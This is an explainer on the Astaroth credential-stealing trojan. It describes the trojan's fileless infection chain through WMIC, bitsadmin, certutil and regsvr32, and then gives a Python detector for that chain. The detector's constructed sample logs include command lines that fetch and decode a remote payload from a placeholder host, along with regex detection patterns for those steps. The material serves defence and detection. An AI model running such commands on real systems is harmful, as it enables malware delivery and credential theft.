
Astaroth trojan: The info-stealer that is widely used in fileless attack campaigns

  • Astaroth is a trojan that steals sensitive information such as user credentials.
  • It uses a keylogger module, interception of operating system calls and clipboard monitoring to steal data.

A new wave of cyberattacks using the Astaroth trojan has resurfaced. The trojan is being delivered through fileless attacks and through malspam campaigns.

What is Astaroth?

Astaroth is a trojan that steals sensitive information such as user credentials. It uses a keylogger module, interception of operating system calls and clipboard monitoring to steal data. The trojan was first detected in 2017, after it was used in multiple South American cyberattacks.

It is used in fileless malware campaigns, in which the payload runs only in the memory of the infected computer rather than as a conventional executable on disk. It also abuses living-off-the-land binaries (LOLBins), such as the command-line interface of WMI (WMIC), to silently download and execute malware payloads in the background.

How does it work?

  • The trojan arrives on the target computer via a malicious link included in a spam email.
  • Once the user clicks the link, a ZIP file is downloaded. The ZIP file contains an LNK file that runs the Windows Management Instrumentation Command-line tool (WMIC) to load an XSL file.
  • The XSL file contains JScript code that runs another WMIC command to download a second XSL file from a remote location, which in turn executes the JScript code embedded in that file.
  • The second JScript stage downloads multiple files using bitsadmin.exe and then decodes them using certutil.exe.
  • One of the decoded binaries is loaded by regsvr32.exe.
  • The loader DLLs decode and load further DLLs.
  • The trojan can then steal information from web browsers and log keystrokes.
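Every step of that chain is carried out by a signed Windows binary, so the practical detection opportunity is the command lines of those LOLBins rather than any malicious file on disk. As an added example that is not part of this article (and not code from any vendor it mentions), the Python below runs simple detection logic over a few constructed process-creation log lines, flagging a host/user that executes several stages of the WMIC, bitsadmin, certutil, regsvr32 chain within a short window. The log format (pipe-separated fields) is an assumption made for the example, as are the specific switches matched (/format:, /transfer, -decode, /s) and the window and threshold values; none of these are indicators quoted from the article.

```python
import re
from collections import defaultdict
from datetime import datetime

# Stage patterns for the LOLBin chain described above. The switches used here
# (/format: for WMIC, /transfer for bitsadmin, -decode for certutil, /s for
# regsvr32) are assumed typical invocations, not indicators quoted from the
# article; tune them to what your own telemetry shows.
STAGES = [
    ("wmic_xsl",      re.compile(r'\bwmic(?:\.exe)?\b.*/format:\s*"?(?:https?://\S+|\S+\.xsl)', re.I)),
    ("bitsadmin_dl",  re.compile(r'\bbitsadmin(?:\.exe)?\b.*/transfer\b.*https?://', re.I)),
    ("certutil_dec",  re.compile(r'\bcertutil(?:\.exe)?\b.*\s-decode\b', re.I)),
    ("regsvr32_load", re.compile(r'\bregsvr32(?:\.exe)?\b.*\s/s\b.*\.dll', re.I)),
]

# Constructed sample telemetry (not real captured data), one event per line:
# timestamp|host|user|parent image|image|command line
SAMPLE_LOG = """\
2019-07-08T10:01:02|ws01|alice|explorer.exe|C:\\Windows\\System32\\wmic.exe|wmic.exe os get /format:"https://example.invalid/v.xsl"
2019-07-08T10:01:05|ws01|alice|wmic.exe|C:\\Windows\\System32\\bitsadmin.exe|bitsadmin /transfer j1 https://example.invalid/a.txt C:\\Users\\Public\\a.txt
2019-07-08T10:01:09|ws01|alice|wmic.exe|C:\\Windows\\System32\\certutil.exe|certutil -decode C:\\Users\\Public\\a.txt C:\\Users\\Public\\a.dll
2019-07-08T10:01:11|ws01|alice|wmic.exe|C:\\Windows\\System32\\regsvr32.exe|regsvr32 /s C:\\Users\\Public\\a.dll
2019-07-08T10:05:00|ws02|bob|cmd.exe|C:\\Windows\\System32\\certutil.exe|certutil -hashfile C:\\tmp\\setup.exe SHA256
"""


def parse_line(line):
    """Split one pipe-separated event into its fields (assumed log format)."""
    ts, host, user, parent, image, cmdline = line.split("|", 5)
    return {"ts": datetime.fromisoformat(ts), "host": host, "user": user,
            "parent": parent, "image": image, "cmdline": cmdline}


def match_stage(cmdline):
    """Return the chain stage a command line matches, or None. A benign
    certutil -hashfile, for instance, matches nothing."""
    for name, pattern in STAGES:
        if pattern.search(cmdline):
            return name
    return None


def detect(log_text, window_seconds=300, min_stages=3):
    """Group stage hits per (host, user) and raise one alert when at least
    min_stages distinct stages occur within window_seconds of each other.
    Requiring several stages keeps a lone certutil or regsvr32 from alerting."""
    hits = defaultdict(list)
    for raw in log_text.splitlines():
        if not raw.strip():
            continue
        ev = parse_line(raw)
        stage = match_stage(ev["cmdline"])
        if stage:
            hits[(ev["host"], ev["user"])].append((ev["ts"], stage))

    alerts = []
    for (host, user), events in hits.items():
        events.sort()
        for i, (t0, _) in enumerate(events):
            window = [s for t, s in events[i:]
                      if (t - t0).total_seconds() <= window_seconds]
            seen = []                      # distinct stages, in order of first appearance
            for s in window:
                if s not in seen:
                    seen.append(s)
            if len(seen) >= min_stages:
                alerts.append({"host": host, "user": user,
                               "start": t0.isoformat(), "stages": seen})
                break                      # one alert per host/user is enough
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

In production telemetry (Sysmon event ID 1 or Windows 4688 with command-line auditing enabled) the same logic applies; the field split is the only part tied to the constructed format. Stage order is not enforced here on purpose, since a host that is missing one event (for example, a dropped log) should still alert when the rest of the chain is present.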

Astaroth variants

A newer version of the Astaroth trojan, which used JPEG, GIF and extension-less files to avoid detection, was used against Brazilian users. The campaign abused legitimate operating system processes and security products to gather information about the target machine and steal passwords.

How to safeguard yourself?

The Astaroth trojan spreads via the internet, portable drives and phishing emails, so it is important to maintain security measures against each of these vectors.

  • Verify attachments and links from unknown sources before opening them;
  • Keep your operating system and software up to date, so that known vulnerabilities cannot be used to gain a foothold;
  • Use two-factor authentication as an extra layer of security for your accounts, so that stolen credentials alone are not enough to log in.